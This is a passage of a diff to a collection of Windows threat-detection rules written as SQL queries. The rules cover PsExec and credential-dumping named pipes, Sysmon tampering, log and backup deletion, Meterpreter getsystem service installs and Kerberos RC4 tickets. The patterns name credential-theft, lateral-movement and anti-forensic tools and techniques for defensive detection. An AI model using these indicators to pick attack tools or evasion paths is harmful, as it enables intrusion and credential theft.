PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\'" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability", - "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject", - "author": "Orlinum , BlueDefenZer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + }, + { + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "falsepositives": [ + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1039" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.impact", "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Legitimate usage of SDelete" + "There are no known false positives at this time" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Add or Remove Computer from DC", - "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "author": "frack113", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_add_remove_computer.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Failed Code Integrity Checks", - "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "status": "stable", - "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", - "author": "Thomas Patzke", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "status": "experimental", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.001" + "attack.t1070" ], "falsepositives": [ - "Disk device errors" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" ], - "filename": "win_security_susp_codeintegrity_check_failure.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "During uninstallation of the IIS service", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "Scheduled Task Deletion", - "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "status": "experimental", - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "author": "David Strassegger, Tim Shelton", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", + "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Software installation" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scheduled_task_deletion.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "TeamViewer Log File Deleted", + "id": "b1decb61-ed83-4339-8e95-53ea51901720", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "file_delete_win_delete_teamviewer_logs.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Possible FP during log rotation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE 